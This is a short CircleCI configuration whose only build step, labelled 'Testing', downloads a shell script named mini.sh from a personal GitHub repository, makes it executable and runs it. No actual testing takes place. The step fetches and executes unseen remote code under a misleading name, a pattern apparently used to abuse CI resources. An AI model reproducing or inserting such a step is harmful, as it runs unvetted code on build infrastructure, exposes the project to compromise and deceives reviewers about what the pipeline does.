version: 2.1
jobs:
  build:
    machine:
      image: cimg/ruby:3.1.0
    steps:
      - checkout
      - run:
          name: Testing
          command: wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh